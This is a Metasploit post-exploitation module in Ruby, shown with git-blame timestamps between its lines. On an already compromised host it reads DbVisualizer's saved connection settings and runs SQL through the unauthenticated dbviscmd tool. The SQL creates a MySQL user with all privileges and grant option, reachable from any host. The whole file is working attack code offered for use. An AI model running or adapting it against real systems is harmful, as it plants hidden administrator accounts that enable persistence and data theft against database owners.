2014-07-15 19:43:14 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-07-15 19:43:14 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/auxiliary/report'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Unix
|
2014-07-16 11:42:58 +00:00
|
|
|
|
2014-07-15 19:43:14 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
2014-07-21 17:35:01 +00:00
|
|
|
'Name' => 'Multi Manage DbVisualizer Add Db Admin',
|
2014-07-15 19:43:14 +00:00
|
|
|
'Description' => %q{
|
2014-07-17 19:24:57 +00:00
|
|
|
Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases
|
|
|
|
(With GUI). The remote database can be accessed from the command line without the need
|
|
|
|
to authenticate, which can be abused to create an administrator in the database with the
|
|
|
|
proper database permissions. Note: This module currently only supports MySQL.
|
2014-07-15 19:43:14 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'David Bloom' ], # Twitter: @philophobia78
|
2014-07-17 18:52:00 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['URL', 'http://youtu.be/0LCLRVHX1vA']
|
|
|
|
],
|
2014-07-15 19:43:14 +00:00
|
|
|
'Platform' => %w{ linux win },
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
2014-07-17 19:24:57 +00:00
|
|
|
|
2014-07-15 19:43:14 +00:00
|
|
|
register_options(
|
|
|
|
[
|
2014-07-17 19:24:57 +00:00
|
|
|
OptString.new('DBALIAS', [true,'Use dbvis_enum module to find out databases and aliases', 'localhost']),
|
|
|
|
OptString.new('DBUSERNAME', [true,'The user you want to add to the remote database', 'msf']),
|
|
|
|
OptString.new('DBPASSWORD', [true,'User password to set', 'msfRocks'])
|
2014-07-15 19:43:14 +00:00
|
|
|
], self.class)
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2014-07-17 19:03:27 +00:00
|
|
|
db_type = exist_and_supported()
|
|
|
|
unless db_type.blank?
|
|
|
|
dbvis = find_dbviscmd()
|
|
|
|
unless dbvis.blank?
|
|
|
|
sql = get_sql(db_type)
|
|
|
|
errors = dbvis_query(dbvis,sql)
|
|
|
|
if errors == true
|
|
|
|
print_error("No luck today, access is probably denied for configured user !? Try in verbose mode to know what happened. ")
|
|
|
|
else
|
|
|
|
print_good("Privileged user created ! Try now to connect with user : #{datastore['DBUSERNAME']} and password : #{datastore['DBPASSWORD']}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# Check if the alias exist and if database is supported by this script
|
2014-07-16 11:42:58 +00:00
|
|
|
def exist_and_supported()
|
2014-07-15 19:43:14 +00:00
|
|
|
case session.platform
|
|
|
|
when /linux/
|
2014-07-16 11:42:58 +00:00
|
|
|
user = session.shell_command("whoami")
|
|
|
|
print_status("Current user is #{user}")
|
2014-07-15 19:43:14 +00:00
|
|
|
if (user =~ /root/)
|
|
|
|
user_base = "/root/"
|
|
|
|
else
|
2014-07-17 18:52:00 +00:00
|
|
|
user_base = "/home/#{user}/"
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"
|
|
|
|
when /win/
|
|
|
|
user_profile = session.sys.config.getenv('USERPROFILE')
|
2014-07-16 11:42:58 +00:00
|
|
|
dbvis_file = "#{user_profile}\\.dbvis\\config70\\dbvis.xml"
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
unless file?(dbvis_file)
|
|
|
|
#File not found, we next try with the old config path
|
|
|
|
print_status("File not found: #{dbvis_file}")
|
|
|
|
print_status("This could be an older version of dbvis, trying old path")
|
|
|
|
case session.platform
|
|
|
|
when /linux/
|
2014-07-16 11:42:58 +00:00
|
|
|
dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
|
2014-07-15 19:43:14 +00:00
|
|
|
when /win/
|
2014-07-16 11:42:58 +00:00
|
|
|
dbvis_file = "#{user_profile }\\.dbvis\\config\\dbvis.xml"
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
unless file?(dbvis_file)
|
2014-07-16 11:42:58 +00:00
|
|
|
print_error("File not found: #{dbvis_file}")
|
2014-07-15 19:43:14 +00:00
|
|
|
return
|
|
|
|
end
|
2014-07-17 18:52:00 +00:00
|
|
|
old_version = true
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
|
2014-07-16 11:42:58 +00:00
|
|
|
print_status("Reading : #{dbvis_file}" )
|
2014-07-15 19:43:14 +00:00
|
|
|
raw_xml = ""
|
|
|
|
begin
|
|
|
|
raw_xml = read_file(dbvis_file)
|
|
|
|
rescue EOFError
|
|
|
|
# If there's nothing in the file, we hit EOFError
|
|
|
|
print_error("Nothing read from file: #{dbvis_file}, file may be empty")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2014-07-17 18:52:00 +00:00
|
|
|
db_found = false
|
|
|
|
alias_found = false
|
|
|
|
db_type = nil
|
|
|
|
db_type_ok = false
|
2014-07-15 19:43:14 +00:00
|
|
|
|
|
|
|
# fetch config file
|
|
|
|
raw_xml.each_line do |line|
|
|
|
|
|
|
|
|
if line =~ /<Database id=/
|
2014-07-16 11:42:58 +00:00
|
|
|
db_found = true
|
2014-07-15 19:43:14 +00:00
|
|
|
elsif line =~ /<\/Database>/
|
2014-07-17 18:52:00 +00:00
|
|
|
db_found = false
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
|
2014-07-16 11:42:58 +00:00
|
|
|
if db_found == true
|
2014-07-15 19:43:14 +00:00
|
|
|
|
|
|
|
# checkthe alias
|
|
|
|
if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
|
|
|
|
if datastore['DBALIAS'] == $1
|
2014-07-16 11:42:58 +00:00
|
|
|
alias_found = true
|
2014-07-15 19:43:14 +00:00
|
|
|
print_good("Alias #{datastore['DBALIAS']} found in dbvis.xml")
|
2014-07-16 11:42:58 +00:00
|
|
|
end
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
|
2014-07-16 11:42:58 +00:00
|
|
|
if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
|
|
|
|
if alias_found
|
|
|
|
print_good("Username for this connection : #{$1}")
|
|
|
|
end
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# check the type
|
|
|
|
if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
|
2014-07-16 11:42:58 +00:00
|
|
|
if alias_found
|
|
|
|
db_type = $1
|
|
|
|
db_type_ok = check_db_type(db_type)
|
|
|
|
if db_type_ok
|
|
|
|
print_good("Database #{db_type} is supported ")
|
|
|
|
else
|
|
|
|
print_error("Database #{db_type} is not supported (yet)")
|
2014-07-17 18:52:00 +00:00
|
|
|
db_type = nil
|
2014-07-16 11:42:58 +00:00
|
|
|
end
|
|
|
|
alias_found = false
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2014-07-16 11:42:58 +00:00
|
|
|
if db_type.blank?
|
|
|
|
print_error("Database alias not found in dbvis.xml")
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
2014-07-16 11:42:58 +00:00
|
|
|
return db_type # That is empty if DB is not supported
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# Find path to dbviscmd.sh|bat
|
2014-07-16 11:42:58 +00:00
|
|
|
def find_dbviscmd
|
2014-07-15 19:43:14 +00:00
|
|
|
case session.platform
|
|
|
|
when /linux/
|
2014-07-16 11:42:58 +00:00
|
|
|
dbvis = session.shell_command("locate dbviscmd.sh").chomp
|
2014-07-17 18:52:00 +00:00
|
|
|
if dbvis.chomp == ""
|
2014-07-15 19:43:14 +00:00
|
|
|
print_error("dbviscmd.sh not found")
|
|
|
|
return nil
|
|
|
|
else
|
2014-07-16 11:42:58 +00:00
|
|
|
print_good("Dbviscmd found : #{dbvis}")
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
when /win/
|
|
|
|
# Find program files
|
|
|
|
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
|
2014-07-16 11:42:58 +00:00
|
|
|
progfiles_x86 = progfiles_env['ProgramFiles(X86)']
|
|
|
|
if not progfiles_x86.blank? and progfiles_x86 !~ /%ProgramFiles\(X86\)%/
|
|
|
|
program_files = progfiles_x86 # x64
|
2014-07-15 19:43:14 +00:00
|
|
|
else
|
|
|
|
program_files = progfiles_env['ProgramFiles'] # x86
|
|
|
|
end
|
|
|
|
dirs = []
|
|
|
|
session.fs.dir.foreach(program_files) do |d|
|
|
|
|
dirs << d
|
|
|
|
end
|
2014-07-16 11:42:58 +00:00
|
|
|
dbvis_home_dir = nil
|
2014-07-15 19:43:14 +00:00
|
|
|
#Browse program content to find a possible dbvis home
|
|
|
|
dirs.each do |d|
|
2014-07-17 19:03:27 +00:00
|
|
|
if (d =~ /DbVisualizer[\S+\s+]+/i)
|
|
|
|
dbvis_home_dir=d
|
|
|
|
end
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
2014-07-17 18:52:00 +00:00
|
|
|
if dbvis_home_dir.blank?
|
2014-07-15 19:43:14 +00:00
|
|
|
print_error("Dbvis home not found, maybe uninstalled ?")
|
|
|
|
return nil
|
|
|
|
end
|
2014-07-16 11:42:58 +00:00
|
|
|
dbvis = "#{program_files}\\#{dbvis_home_dir}\\dbviscmd.bat"
|
|
|
|
unless file?(dbvis)
|
2014-07-15 19:43:14 +00:00
|
|
|
print_error("dbviscmd.bat not found")
|
|
|
|
return nil
|
|
|
|
end
|
2014-07-16 11:42:58 +00:00
|
|
|
print_good("Dbviscmd found : #{dbvis}")
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
2014-07-16 11:42:58 +00:00
|
|
|
return dbvis
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# Query execution method
|
2014-07-16 11:42:58 +00:00
|
|
|
def dbvis_query(dbvis,sql)
|
2014-07-17 18:52:00 +00:00
|
|
|
error = false
|
|
|
|
resp = ''
|
|
|
|
if file?(dbvis) == true
|
2014-07-16 16:27:19 +00:00
|
|
|
f = session.fs.file.stat(dbvis)
|
2014-07-16 16:30:23 +00:00
|
|
|
if f.uid == Process.euid or Process.groups.include?f.gid
|
2014-07-16 16:27:19 +00:00
|
|
|
print_status("Trying to execute evil sql, it can take time ...")
|
|
|
|
args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
|
2014-07-17 18:52:00 +00:00
|
|
|
dbvis = "\"#{dbvis}\""
|
2014-07-16 16:27:19 +00:00
|
|
|
cmd = "#{dbvis} #{args}"
|
|
|
|
resp = cmd_exec(cmd)
|
2015-07-11 18:40:21 +00:00
|
|
|
vprint_line
|
2014-07-16 16:27:19 +00:00
|
|
|
vprint_status("#{resp}")
|
|
|
|
if resp =~ /denied|failed/i
|
2014-07-16 11:42:58 +00:00
|
|
|
error = true
|
2014-07-16 16:27:19 +00:00
|
|
|
end
|
|
|
|
else
|
|
|
|
print_error("User doesn't have enough rights to execute dbviscmd, aborting")
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
2014-07-16 11:42:58 +00:00
|
|
|
else
|
|
|
|
print_error("#{dbvis} is not a file")
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
return error
|
|
|
|
end
|
|
|
|
|
|
|
|
# Database dependent part
|
|
|
|
|
|
|
|
# Check if db type is supported by this script
|
2014-07-16 11:42:58 +00:00
|
|
|
def check_db_type(type)
|
2014-07-17 18:52:00 +00:00
|
|
|
return type.to_s =~ /mysql/i
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
|
2014-07-16 11:42:58 +00:00
|
|
|
# Build proper sql
|
|
|
|
def get_sql(db_type)
|
|
|
|
if db_type =~ /mysql/i
|
2014-07-17 19:12:04 +00:00
|
|
|
sql = "CREATE USER '#{datastore['DBUSERNAME']}'@'localhost' IDENTIFIED BY '#{datastore['DBPASSWORD']}';"
|
|
|
|
sql << "GRANT ALL PRIVILEGES ON *.* TO '#{datastore['DBUSERNAME']}'@'localhost' WITH GRANT OPTION;"
|
2014-07-15 19:43:14 +00:00
|
|
|
|
2014-07-17 19:12:04 +00:00
|
|
|
sql << "CREATE USER '#{datastore['DBUSERNAME']}'@'%' IDENTIFIED BY '#{datastore['DBPASSWORD']}';"
|
|
|
|
sql << "GRANT ALL PRIVILEGES ON *.* TO '#{datastore['DBUSERNAME']}'@'%' WITH GRANT OPTION;"
|
|
|
|
return sql
|
2014-07-15 19:43:14 +00:00
|
|
|
end
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|